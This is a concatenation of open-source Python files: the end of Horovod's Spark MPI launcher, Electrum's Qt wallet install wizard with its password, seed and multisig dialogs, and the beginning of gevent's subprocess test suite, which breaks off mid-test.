print('Initial Spark task registration is complete.')
task_clients = [
task_service.SparkTaskClient(index,
driver.task_addresses_for_driver(index),
settings.key, settings.verbose)
for index in range(settings.num_proc)]
for task_client in task_clients:
task_client.notify_initial_registration_complete()
driver.wait_for_task_to_task_address_updates(settings.timeout)
if settings.verbose >= 2:
print('Spark task-to-task address registration is complete.')
# Determine a set of common interfaces for task-to-task communication.
common_intfs = set(driver.task_addresses_for_tasks(0).keys())
for index in range(1, settings.num_proc):
common_intfs.intersection_update(driver.task_addresses_for_tasks(index).keys())
if not common_intfs:
raise Exception('Unable to find a set of common task-to-task communication interfaces: %s'
% [(index, driver.task_addresses_for_tasks(index)) for index in range(settings.num_proc)])
# Determine the index grouping based on host hashes.
# Barrel shift until index 0 is in the first host.
host_hashes = list(driver.task_host_hash_indices().keys())
host_hashes.sort()
while 0 not in driver.task_host_hash_indices()[host_hashes[0]]:
host_hashes = host_hashes[1:] + host_hashes[:1]
settings.hosts = ','.join('%s:%d' % (host_hash, len(driver.task_host_hash_indices()[host_hash]))
for host_hash in host_hashes)
ranks_to_indices = []
for host_hash in host_hashes:
ranks_to_indices += driver.task_host_hash_indices()[host_hash]
driver.set_ranks_to_indices(ranks_to_indices)
if env is None:
env = os.environ.copy()
# Pass secret key through the environment variables.
env[secret.HOROVOD_SECRET_KEY] = codec.dumps_base64(settings.key)
rsh_agent = (sys.executable,
'-m', 'horovod.spark.driver.mpirun_rsh',
codec.dumps_base64(driver.addresses()),
codec.dumps_base64(settings))
settings.extra_mpi_args = ('{extra_mpi_args} -x NCCL_DEBUG=INFO -mca plm_rsh_agent "{rsh_agent}"'
.format(extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else '',
rsh_agent=' '.join(rsh_agent)))
command = (sys.executable,
'-m', 'horovod.spark.task.mpirun_exec_fn',
codec.dumps_base64(driver.addresses()),
codec.dumps_base64(settings))
mpi_run(settings, common_intfs, env, command, stdout=stdout, stderr=stderr, run_func=run_func)
except:
# Terminate Spark job.
spark_context.cancelJobGroup(spark_job_group)
# Re-raise exception.
raise
finally:
spark_thread.join()
driver.shutdown()
# Make sure Spark Job did not fail.
driver.check_for_spark_job_failure()
# If there's no exception, execution results are in this queue.
results = result_queue.get_nowait()
return [results[index] for index in ranks_to_indices]
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum.network import Network
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
from electrum.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
# to go back from the current dialog, we just let the caller unroll the stack:
raise
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
try:
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
finally:
playout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network: 'Network'):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
test__subprocess.py
|
import sys
import os
import errno
import unittest
import time
import gc
import tempfile
import gevent.testing as greentest
import gevent
from gevent.testing import mock
from gevent import subprocess
if not hasattr(subprocess, 'mswindows'):
# PyPy3, native python subprocess
subprocess.mswindows = False
PYPY = hasattr(sys, 'pypy_version_info')
PY3 = sys.version_info[0] >= 3
if subprocess.mswindows:
SETBINARY = 'import msvcrt; msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY);'
else:
SETBINARY = ''
python_universal_newlines = hasattr(sys.stdout, 'newlines')
# The stdlib of Python 3 on Windows doesn't properly handle universal newlines
# (it produces broken results compared to Python 2)
# See gevent.subprocess for more details.
python_universal_newlines_broken = PY3 and subprocess.mswindows
class Test(greentest.TestCase):
def setUp(self):
super(Test, self).setUp()
gc.collect()
gc.collect()
def test_exit(self):
popen = subprocess.Popen([sys.executable, '-c', 'import sys; sys.exit(10)'])
self.assertEqual(popen.wait(), 10)
def test_wait(self):
popen = subprocess.Popen([sys.executable, '-c', 'import sys; sys.exit(11)'])
gevent.wait([popen])
self.assertEqual(popen.poll(), 11)
def test_child_exception(self):
try:
subprocess.Popen(['*']).wait()
except OSError as ex:
assert ex.errno == 2, ex
else:
raise AssertionError('Expected OSError: [Errno 2] No such file or directory')
def test_leak(self):
num_before = greentest.get_number_open_files()
p = subprocess.Popen([sys.executable, "-c", "print()"],
stdout=subprocess.PIPE)
p.wait()
p.stdout.close()
del p
if PYPY:
gc.collect()
gc.collect()
num_after = greentest.get_number_open_files()
self.assertEqual(num_before, num_after)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-W", "ignore",
"-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
if sys.executable.endswith('-dbg'):
assert stderr.startswith(b'pineapple')
else:
self.assertEqual(stderr, b"pineapple")
@greentest.skipIf(subprocess.mswindows,
"Windows does weird things here")
@greentest.skipOnLibuvOnCIOnPyPy("Sometimes segfaults")
def test_communicate_universal(self):
# Native string all the things. See https://github.com/gevent/gevent/issues/1039
p = subprocess.Popen(
[
sys.executable,
"-W", "ignore",
"-c",
'import sys,os;'
'sys.stderr.write("pineapple\\r\\n\\xff\\xff\\xf2\\xf9\\r\\n");'
'sys.stdout.write(sys.stdin.read())'
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
(stdout, stderr) = p.communicate('banana\r\n\xff\xff\xf2\xf9\r\n')
self.assertIsInstance(stdout, str)
self.assertIsInstance(stderr, str)
self.assertEqual(stdout,
'banana\n\xff\xff\xf2\xf9\n')
self.assertEqual(stderr,
'pineapple\n\xff\xff\xf2\xf9\n')
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_universal1(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE,
universal_newlines=1,
bufsize=1)
try:
stdout = p.stdout.read()
if python_universal_newlines:
# Interpreter with universal newline support
if not python_universal_newlines_broken:
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Note the extra newline after line 3
self.assertEqual(stdout,
'line1\nline2\nline3\n\nline4\n\nline5\nline6')
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
finally:
p.stdout.close()
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_universal2(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE,
universal_newlines=1,
bufsize=1)
try:
stdout = p.stdout.read()
if python_universal_newlines:
# Interpreter with universal newline support
if not python_universal_newlines_broken:
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Note the extra newline after line 3
self.assertEqual(stdout,
'line1\nline2\nline3\n\nline4\n\nline5\nline6')
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
finally:
p.stdout.close()
if sys.platform != 'win32':
def test_nonblock_removed(self):
# see issue #134
r, w = os.pipe()
stdin = subprocess.FileObject(r)
p = subprocess.Popen(['grep', 'text'], stdin=stdin)
try:
# Closing one half of the pipe causes Python 3 on OS X to terminate the
# child process; it exits with code 1 and the assert that p.poll is None
